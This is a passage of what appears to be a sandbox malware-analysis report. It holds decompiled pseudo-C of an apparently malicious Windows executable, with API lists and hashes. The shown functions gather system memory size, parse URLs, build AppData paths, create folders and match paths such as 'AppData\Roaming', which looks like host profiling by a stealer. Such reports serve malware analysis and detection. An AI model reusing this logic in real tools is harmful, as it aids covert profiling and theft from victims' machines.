                                                                                						if(_t23 == 0xffffffff) {
                                                                                							E0041E1C5(_t43 - 0x20, "bad cast");
                                                                                							E00421126(_t43 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t42 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						 *0x44a440 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t43 - 0x10)));
                                                                                						E0041D711(__eflags, _t42);
                                                                                					} else {
                                                                                						_t42 = _t38;
                                                                                					}
                                                                                				}
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t43 - 0x14);
                                                                                				return E00421A4D(_t42);
                                                                                			}







                                                                                0x004151f1
                                                                                0x004151f8
                                                                                0x00415202
                                                                                0x00415207
                                                                                0x0041520b
                                                                                0x00415216
                                                                                0x00415223
                                                                                0x00415228
                                                                                0x0041522c
                                                                                0x00415230
                                                                                0x00415236
                                                                                0x0041523c
                                                                                0x00415242
                                                                                0x00415245
                                                                                0x0041524f
                                                                                0x0041525d
                                                                                0x0041525d
                                                                                0x00415262
                                                                                0x00415267
                                                                                0x0041526d
                                                                                0x00415273
                                                                                0x00415232
                                                                                0x00415232
                                                                                0x00415232
                                                                                0x00415230
                                                                                0x00415279
                                                                                0x00415280
                                                                                0x0041528c

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004151F8
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00415202
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0041524F
                                                                                • __CxxThrowException@8.LIBCMT ref: 0041525D
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 0041526D
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00415273
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 43ebfc5e4479da13a5ba4c7bf0b6d3be70f91e6de8530bd2fa91cfc17dc6485f
                                                                                • Instruction ID: c875c72b6e774d6aa8dbb0c19a26dc0e7a87a73fa6513ac8c9be47a6431904dc
                                                                                • Opcode Fuzzy Hash: 43ebfc5e4479da13a5ba4c7bf0b6d3be70f91e6de8530bd2fa91cfc17dc6485f
                                                                                • Instruction Fuzzy Hash: 0B018472940625DBCF10EB61DD426ED73306F54768F50026AF8207B2D1DB7C5E458B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041599F(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                				signed int _v8;
                                                                                				unsigned int _v64;
                                                                                				signed int _v68;
                                                                                				char _v76;
                                                                                				void* _v80;
                                                                                				signed int _t17;
                                                                                				struct _MEMORYSTATUSEX* _t23;
                                                                                				unsigned int _t24;
                                                                                				unsigned int _t29;
                                                                                				void* _t30;
                                                                                				signed int _t31;
                                                                                				void* _t36;
                                                                                				void* _t37;
                                                                                				void* _t38;
                                                                                				signed int _t39;
                                                                                
                                                                                				_t38 = __esi;
                                                                                				_t37 = __edi;
                                                                                				_t36 = __edx;
                                                                                				_t30 = __ebx;
                                                                                				_t17 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t17 ^ _t39;
                                                                                				_v80 = _v80 & 0x00000000;
                                                                                				_v80 = HeapAlloc(GetProcessHeap(), 0, 0x104);
                                                                                				E00427E30( &_v76, 0, 0x40);
                                                                                				_t23 =  &_v76;
                                                                                				_v76 = 0x40;
                                                                                				GlobalMemoryStatusEx(_t23);
                                                                                				if(_t23 != 1) {
                                                                                					_t31 = 0;
                                                                                					_t24 = 0;
                                                                                				} else {
                                                                                					_t29 = _v64;
                                                                                					_t31 = (_t29 << 0x00000020 | _v68) >> 0x14;
                                                                                					_t24 = _t29 >> 0x14;
                                                                                				}
                                                                                				wsprintfA(_v80, "%d MB", _t31);
                                                                                				E0040C606(_t30, _v80);
                                                                                				return E0041DEB4(_t30, _t30, _v8 ^ _t39, _t36, _t37, _t38, _t24);
                                                                                			}


















                                                                                0x0041599f
                                                                                0x0041599f
                                                                                0x0041599f
                                                                                0x0041599f
                                                                                0x004159a5
                                                                                0x004159ac
                                                                                0x004159af
                                                                                0x004159c9
                                                                                0x004159d2
                                                                                0x004159da
                                                                                0x004159de
                                                                                0x004159e5
                                                                                0x004159ee
                                                                                0x004159ff
                                                                                0x00415a01
                                                                                0x004159f0
                                                                                0x004159f0
                                                                                0x004159f6
                                                                                0x004159fa
                                                                                0x004159fa
                                                                                0x00415a0d
                                                                                0x00415a1b
                                                                                0x00415a2d

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004159BA
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004159C1
                                                                                • _memset.LIBCMT ref: 004159D2
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 004159E5
                                                                                • wsprintfA.USER32 ref: 00415A0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
                                                                                • String ID: %d MB$@
                                                                                • API String ID: 3402858368-3474575989
                                                                                • Opcode ID: 21b5015eed96d8b2f0c786e3da0a9527452dd9c346370e6a9420be8e0ce5cb8e
                                                                                • Instruction ID: 132e4d91e79677ea5f4a97a9146bdc09f983337fcba31e7f33af261b7e253cb1
                                                                                • Opcode Fuzzy Hash: 21b5015eed96d8b2f0c786e3da0a9527452dd9c346370e6a9420be8e0ce5cb8e
                                                                                • Instruction Fuzzy Hash: C601B5B1E40208EBDB04DFF4DD4ABEEBBB5EF04308F40013AF512E6291DA7998558B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0040E608(CHAR* __ebx, void* __edi, void* __esi) {
                                                                                				signed int _v8;
                                                                                				char _v72;
                                                                                				intOrPtr _v124;
                                                                                				char* _v128;
                                                                                				void* _v132;
                                                                                				signed int _t11;
                                                                                				int _t20;
                                                                                				char* _t21;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                				void* _t28;
                                                                                				signed int _t29;
                                                                                
                                                                                				_t28 = __esi;
                                                                                				_t27 = __edi;
                                                                                				_t23 = __ebx;
                                                                                				_t11 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t11 ^ _t29;
                                                                                				E00427E30( &_v72, 0, 0x40);
                                                                                				E00427E30( &_v132, 0, 0x3c);
                                                                                				_v128 =  &_v72;
                                                                                				_v132 = 0x3c;
                                                                                				_v124 = 0x40;
                                                                                				_t20 = InternetCrackUrlA(__ebx, lstrlenA(__ebx), 0x10000000,  &_v132);
                                                                                				_t21 = _v128;
                                                                                				if(_t20 == 0) {
                                                                                					_t21 = "http";
                                                                                				}
                                                                                				return E0041DEB4(_t21, _t23, _v8 ^ _t29, _t26, _t27, _t28);
                                                                                			}















                                                                                0x0040e608
                                                                                0x0040e608
                                                                                0x0040e608
                                                                                0x0040e611
                                                                                0x0040e618
                                                                                0x0040e623
                                                                                0x0040e630
                                                                                0x0040e63b
                                                                                0x0040e648
                                                                                0x0040e64f
                                                                                0x0040e65e
                                                                                0x0040e666
                                                                                0x0040e669
                                                                                0x0040e66b
                                                                                0x0040e66b
                                                                                0x0040e67b

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040E623
                                                                                • _memset.LIBCMT ref: 0040E630
                                                                                • lstrlenA.KERNEL32(?,10000000,?), ref: 0040E656
                                                                                • InternetCrackUrlA.WININET(?,00000000,?,10000000), ref: 0040E65E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$CrackInternetlstrlen
                                                                                • String ID: <$@$http
                                                                                • API String ID: 3332450456-26727890
                                                                                • Opcode ID: 3c07f5136c2212134578f3be1db12c889cabb7cfc9517224c5ff93190045ad1f
                                                                                • Instruction ID: a1fab18151acf50d00da9c05d04658c4d4dae75c64f1ef6e70972835663979f5
                                                                                • Opcode Fuzzy Hash: 3c07f5136c2212134578f3be1db12c889cabb7cfc9517224c5ff93190045ad1f
                                                                                • Instruction Fuzzy Hash: 1701E671E402089BEB10DFE5DD46FAEB7BCAB14708F900469F605F7181D778A9048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E004137F9(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t71;
                                                                                				WCHAR* _t77;
                                                                                				signed char _t78;
                                                                                				void* _t90;
                                                                                				void* _t96;
                                                                                				intOrPtr _t97;
                                                                                				char* _t104;
                                                                                				void* _t106;
                                                                                				void* _t113;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                
                                                                                				_t104 = __edx;
                                                                                				E004219DE(E0043730B, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t119 - 0x268)) =  *((intOrPtr*)(_t119 + 8));
                                                                                				 *((intOrPtr*)(_t119 - 0x26c)) =  *((intOrPtr*)(_t119 + 0xc));
                                                                                				_t106 = __ecx;
                                                                                				 *((intOrPtr*)(_t119 - 0x260)) = 0;
                                                                                				 *((intOrPtr*)(_t119 - 0x25c)) = 0;
                                                                                				E00427E30(_t119 - 0x220, 0, 0x104);
                                                                                				_t96 = 0x1c;
                                                                                				E00417B4D(_t96);
                                                                                				 *0x44a1b8(_t119 - 0x220, _t106, _t119 - 0x220, 0x264);
                                                                                				E00427E30(_t119 - 0x118, 0, 0x104);
                                                                                				_t122 = _t120 + 0x18;
                                                                                				 *0x44a1b8(_t119 - 0x118, _t119 - 0x220);
                                                                                				 *0x44a1b8(_t119 - 0x118, "\\");
                                                                                				 *0x44a1b8(_t119 - 0x118,  *0x449cf8);
                                                                                				_t71 = _t119 - 0x118;
                                                                                				 *((intOrPtr*)(_t119 - 0x228)) = 0xf;
                                                                                				 *((intOrPtr*)(_t119 - 0x22c)) = 0;
                                                                                				 *((char*)(_t119 - 0x23c)) = 0;
                                                                                				_t113 = _t71 + 1;
                                                                                				do {
                                                                                					_t97 =  *_t71;
                                                                                					_t71 = _t71 + 1;
                                                                                					_t126 = _t97;
                                                                                				} while (_t97 != 0);
                                                                                				E00403A16(_t119 - 0x23c, _t126, _t119 - 0x118, _t71 - _t113);
                                                                                				 *(_t119 - 4) = 0;
                                                                                				_t77 = E004175C4(_t119 - 0x23c, _t119 - 0x258);
                                                                                				if(_t77[0xa] >= 8) {
                                                                                					_t77 =  *_t77;
                                                                                				}
                                                                                				_t78 = GetFileAttributesW(_t77);
                                                                                				if(_t78 == 0xffffffff) {
                                                                                					L6:
                                                                                					 *((intOrPtr*)(_t119 - 0x264)) = 0;
                                                                                					goto L7;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t119 - 0x264)) = 1;
                                                                                					if((_t78 & 0x00000010) == 0) {
                                                                                						L7:
                                                                                						_t114 = _t119 - 0x258;
                                                                                						E00403960(0, _t119 - 0x258, 1);
                                                                                						 *(_t119 - 4) =  *(_t119 - 4) | 0xffffffff;
                                                                                						E00402C34(_t119 - 0x23c, 1, 0);
                                                                                						_t130 =  *((intOrPtr*)(_t119 - 0x264));
                                                                                						if( *((intOrPtr*)(_t119 - 0x264)) != 0) {
                                                                                							_push(_t119 - 0x25c);
                                                                                							_push(_t119 - 0x118);
                                                                                							_t90 = E0040F7A2(0, _t119 - 0x260, 0, _t114, _t130);
                                                                                							_t131 = _t90;
                                                                                							if(_t90 == 0) {
                                                                                								E0040F708(_t119 - 0x260, _t119 - 0x25c);
                                                                                							}
                                                                                						}
                                                                                						_t115 =  *((intOrPtr*)(_t119 - 0x268));
                                                                                						E00410EAE( *((intOrPtr*)(_t119 - 0x268)), _t104, 0x43e028, _t119 - 0x220,  *((intOrPtr*)(_t119 - 0x26c)),  *((intOrPtr*)(_t119 - 0x260)),  *((intOrPtr*)(_t119 - 0x25c)));
                                                                                						_push(0);
                                                                                						_t123 = _t122 - 0x1c;
                                                                                						 *((intOrPtr*)(_t119 - 0x264)) = _t122 - 0x1c;
                                                                                						E0040410F(_t123, _t115 + 8);
                                                                                						_push( *((intOrPtr*)(_t119 - 0x26c)));
                                                                                						E00413046(_t119 - 0x220,  *((intOrPtr*)(_t119 - 0x268)),  *((intOrPtr*)(_t119 - 0x268)), _t123, _t131);
                                                                                						E0040F708(_t119 - 0x260, _t119 - 0x25c);
                                                                                						return E00421A61(_t119 - 0x220, _t119 - 0x260, _t119 - 0x25c);
                                                                                					}
                                                                                					goto L6;
                                                                                				}
                                                                                			}















                                                                                0x004137f9
                                                                                0x00413803
                                                                                0x0041380b
                                                                                0x0041381c
                                                                                0x0041382a
                                                                                0x0041382c
                                                                                0x00413832
                                                                                0x00413838
                                                                                0x00413849
                                                                                0x0041384a
                                                                                0x00413857
                                                                                0x00413866
                                                                                0x0041386b
                                                                                0x0041387c
                                                                                0x0041388e
                                                                                0x004138a1
                                                                                0x004138a7
                                                                                0x004138ad
                                                                                0x004138b7
                                                                                0x004138bd
                                                                                0x004138c3
                                                                                0x004138c6
                                                                                0x004138c6
                                                                                0x004138c8
                                                                                0x004138c9
                                                                                0x004138c9
                                                                                0x004138dd
                                                                                0x004138ef
                                                                                0x004138f2
                                                                                0x004138fb
                                                                                0x004138fd
                                                                                0x004138fd
                                                                                0x00413900
                                                                                0x00413909
                                                                                0x00413919
                                                                                0x00413919
                                                                                0x00000000
                                                                                0x0041390b
                                                                                0x0041390b
                                                                                0x00413917
                                                                                0x0041391f
                                                                                0x00413923
                                                                                0x00413929
                                                                                0x0041392e
                                                                                0x0041393b
                                                                                0x00413940
                                                                                0x00413946
                                                                                0x0041394e
                                                                                0x00413955
                                                                                0x0041395c
                                                                                0x00413963
                                                                                0x00413965
                                                                                0x00413973
                                                                                0x00413973
                                                                                0x00413965
                                                                                0x0041397e
                                                                                0x0041399e
                                                                                0x004139a3
                                                                                0x004139a4
                                                                                0x004139ac
                                                                                0x004139b3
                                                                                0x004139b8
                                                                                0x004139ca
                                                                                0x004139db
                                                                                0x004139e5
                                                                                0x004139e5
                                                                                0x00000000
                                                                                0x00413917

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00413803
                                                                                • _memset.LIBCMT ref: 00413838
                                                                                  • Part of subcall function 00417B4D: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00413DBC,014A10F8,00413DBC,?,?,?,?,?,?,?), ref: 00417B63
                                                                                • lstrcat.KERNEL32(?), ref: 00413857
                                                                                • _memset.LIBCMT ref: 00413866
                                                                                • lstrcat.KERNEL32(?,?), ref: 0041387C
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 0041388E
                                                                                • lstrcat.KERNEL32(?), ref: 004138A1
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413900
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$_memset$AttributesFileFolderH_prolog3_Path
                                                                                • String ID:
                                                                                • API String ID: 1831167774-0
                                                                                • Opcode ID: 9314708ec2391b29566c0b4ecaab98350932fe833fb1522d4f63b9c0f93d808f
                                                                                • Instruction ID: 589a201fac651d41cb59c2bd0a7baf71dceb7bfaedf009a0142204bc568f4e68
                                                                                • Opcode Fuzzy Hash: 9314708ec2391b29566c0b4ecaab98350932fe833fb1522d4f63b9c0f93d808f
                                                                                • Instruction Fuzzy Hash: AC5150B1C0522CAACF20EF55DC89ADAB7B8AF04314F1041EAA549B3151DB759FC9CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E00407659(void* __esi) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				signed int _t27;
                                                                                				intOrPtr* _t31;
                                                                                				intOrPtr* _t45;
                                                                                				void* _t46;
                                                                                				char* _t51;
                                                                                				intOrPtr _t53;
                                                                                				void* _t54;
                                                                                				intOrPtr* _t57;
                                                                                				void* _t58;
                                                                                				void* _t61;
                                                                                				char _t62;
                                                                                				intOrPtr _t63;
                                                                                				intOrPtr* _t65;
                                                                                				void* _t66;
                                                                                				void* _t67;
                                                                                				intOrPtr* _t68;
                                                                                				void* _t69;
                                                                                				signed int _t70;
                                                                                				void* _t72;
                                                                                				void* _t73;
                                                                                
                                                                                				_t67 = __esi;
                                                                                				_t70 = _t72 - 0x18c;
                                                                                				_t73 = _t72 - 0x20c;
                                                                                				_t27 =  *0x447674; // 0x4124c941
                                                                                				 *(_t70 + 0x188) = _t27 ^ _t70;
                                                                                				_t53 =  *((intOrPtr*)(_t70 + 0x194));
                                                                                				_t65 =  *((intOrPtr*)(_t70 + 0x198));
                                                                                				if(_t53 == 0) {
                                                                                					L9:
                                                                                					_t29 =  *_t65;
                                                                                					if(_t29 == 0) {
                                                                                						L23:
                                                                                						_pop(_t66);
                                                                                						_pop(_t54);
                                                                                						return E0041DEB4(_t29, _t54,  *(_t70 + 0x188) ^ _t70, _t63, _t66, _t67);
                                                                                					}
                                                                                					_push(_t67);
                                                                                					_t68 = _t65;
                                                                                					_t57 = _t65;
                                                                                					do {
                                                                                						if(_t29 == 0x2f || _t29 == 0x5c) {
                                                                                							_t68 = _t57;
                                                                                						}
                                                                                						_t57 = _t57 + 1;
                                                                                						_t29 =  *_t57;
                                                                                					} while (_t29 != 0);
                                                                                					if(_t68 != _t65) {
                                                                                						_t69 = _t68 - _t65;
                                                                                						E00421230(_t70 - 0x80, _t65, _t69);
                                                                                						_push(_t70 - 0x80);
                                                                                						_push(_t53);
                                                                                						 *((char*)(_t70 + _t69 - 0x80)) = 0;
                                                                                						E00407659(_t69);
                                                                                						_t73 = _t73 + 0x14;
                                                                                					}
                                                                                					 *(_t70 + 0x84) = 0;
                                                                                					_pop(_t67);
                                                                                					if(_t53 != 0) {
                                                                                						E0041ECF0(_t70 + 0x84, _t53, 0x104);
                                                                                						_t73 = _t73 + 0xc;
                                                                                					}
                                                                                					_t31 = _t70 + 0x84;
                                                                                					 *((char*)(_t70 + 0x187)) = 0;
                                                                                					_t58 = _t31 + 1;
                                                                                					do {
                                                                                						_t63 =  *_t31;
                                                                                						_t31 = _t31 + 1;
                                                                                					} while (_t63 != 0);
                                                                                					E0041ECF0(_t70 + _t31 - _t58 + 0x84, _t65, 0x104 - _t31 - _t58);
                                                                                					 *((char*)(_t70 + 0x187)) = 0;
                                                                                					if(GetFileAttributesA(_t70 + 0x84) == 0xffffffff) {
                                                                                						_t29 = CreateDirectoryA(_t70 + 0x84, 0);
                                                                                					}
                                                                                					goto L23;
                                                                                				} else {
                                                                                					E0041ECF0(_t70 - 0x80, _t53, 0x104);
                                                                                					_t45 = _t70 - 0x80;
                                                                                					_t73 = _t73 + 0xc;
                                                                                					_t61 = _t45 + 1;
                                                                                					do {
                                                                                						_t63 =  *_t45;
                                                                                						_t45 = _t45 + 1;
                                                                                					} while (_t63 != 0);
                                                                                					_t46 = _t45 - _t61;
                                                                                					if(_t46 != 0) {
                                                                                						_t51 = _t70 + _t46 - 0x81;
                                                                                						_t62 =  *_t51;
                                                                                						if(_t62 == 0x2f || _t62 == 0x5c) {
                                                                                							 *_t51 = 0;
                                                                                						}
                                                                                					}
                                                                                					if(GetFileAttributesA(_t70 - 0x80) == 0xffffffff) {
                                                                                						CreateDirectoryA(_t70 - 0x80, 0);
                                                                                					}
                                                                                					goto L9;
                                                                                				}
                                                                                			}

























                                                                                0x00407659
                                                                                0x0040765a
                                                                                0x00407661
                                                                                0x00407667
                                                                                0x0040766e
                                                                                0x00407675
                                                                                0x0040767c
                                                                                0x00407684
                                                                                0x004076da
                                                                                0x004076da
                                                                                0x004076de
                                                                                0x00407798
                                                                                0x0040779e
                                                                                0x004077a1
                                                                                0x004077ae
                                                                                0x004077ae
                                                                                0x004076e4
                                                                                0x004076e5
                                                                                0x004076e7
                                                                                0x004076e9
                                                                                0x004076eb
                                                                                0x004076f1
                                                                                0x004076f1
                                                                                0x004076f3
                                                                                0x004076f4
                                                                                0x004076f6
                                                                                0x004076fc
                                                                                0x004076fe
                                                                                0x00407706
                                                                                0x0040770e
                                                                                0x0040770f
                                                                                0x00407710
                                                                                0x00407715
                                                                                0x0040771a
                                                                                0x0040771a
                                                                                0x0040771d
                                                                                0x00407724
                                                                                0x00407727
                                                                                0x00407736
                                                                                0x0040773b
                                                                                0x0040773b
                                                                                0x0040773e
                                                                                0x00407744
                                                                                0x0040774b
                                                                                0x0040774e
                                                                                0x0040774e
                                                                                0x00407750
                                                                                0x00407751
                                                                                0x00407768
                                                                                0x00407777
                                                                                0x00407787
                                                                                0x00407792
                                                                                0x00407792
                                                                                0x00000000
                                                                                0x00407686
                                                                                0x00407690
                                                                                0x00407695
                                                                                0x00407698
                                                                                0x0040769b
                                                                                0x0040769e
                                                                                0x0040769e
                                                                                0x004076a0
                                                                                0x004076a1
                                                                                0x004076a5
                                                                                0x004076a7
                                                                                0x004076a9
                                                                                0x004076b0
                                                                                0x004076b5
                                                                                0x004076bc
                                                                                0x004076bc
                                                                                0x004076b5
                                                                                0x004076cc
                                                                                0x004076d4
                                                                                0x004076d4
                                                                                0x00000000
                                                                                0x004076cc

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?), ref: 004076C3
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?), ref: 004076D4
                                                                                • __fassign.LIBCMT ref: 00407690
                                                                                  • Part of subcall function 0041ECF0: __mbsnbcpy_l.LIBCMT ref: 0041ED00
                                                                                • _memmove.LIBCMT ref: 00407706
                                                                                • __fassign.LIBCMT ref: 00407736
                                                                                • __fassign.LIBCMT ref: 00407768
                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?), ref: 0040777E
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?), ref: 00407792
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l_memmove
                                                                                • String ID:
                                                                                • API String ID: 2134100740-0
                                                                                • Opcode ID: f8c7a26ef7c2f9a89125e4f50a0f2ac06a42349a1003b8ebf5ae504ee813924d
                                                                                • Instruction ID: bc05102da5ba6990e3dd54e7094b3a5e9df3f6b73620ec68af31c080aebe20d8
                                                                                • Opcode Fuzzy Hash: f8c7a26ef7c2f9a89125e4f50a0f2ac06a42349a1003b8ebf5ae504ee813924d
                                                                                • Instruction Fuzzy Hash: BB412B718042485ADF20DF6C9CC8BEA3BACAF16314F54057AE945D72C2DF79AA0C8765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E00409245(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t40;
                                                                                				intOrPtr* _t61;
                                                                                				void* _t106;
                                                                                				void* _t107;
                                                                                				signed int _t113;
                                                                                				signed int _t114;
                                                                                				void* _t115;
                                                                                
                                                                                				_t107 = __ecx;
                                                                                				_push(0x20);
                                                                                				E004219DE(E004362DF, __ebx, __edi, __esi);
                                                                                				_t113 = _t115 - 0x2c;
                                                                                				 *((intOrPtr*)(_t115 - 4)) = 0;
                                                                                				_t106 = 0;
                                                                                				E0040410F(_t113, _t115 + 8);
                                                                                				_t40 = E0040C664(_t113, "C:\\Windows\\", 0);
                                                                                				_t114 = _t113 | 0xffffffff;
                                                                                				if(_t40 != _t114) {
                                                                                					_t106 = 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c, "C:\\\\Windows\\", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c, "C:\\\\\\Windows\\", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x44a030, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449f90, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ef0, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ef4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d24, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d98, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449f08, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449fb0, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				_t61 =  *0x448570; // 0x0
                                                                                				if( *0x448584 < 0x10) {
                                                                                					_t61 = 0x448570;
                                                                                				}
                                                                                				if(E0040CFFC(0, _t107, _t115 - 0x2c, _t61,  *0x448580) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449c24, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449fa8, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449e90, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449be4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d08, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449e20, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449dd4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ff4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c, "AppData\\Roaming", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
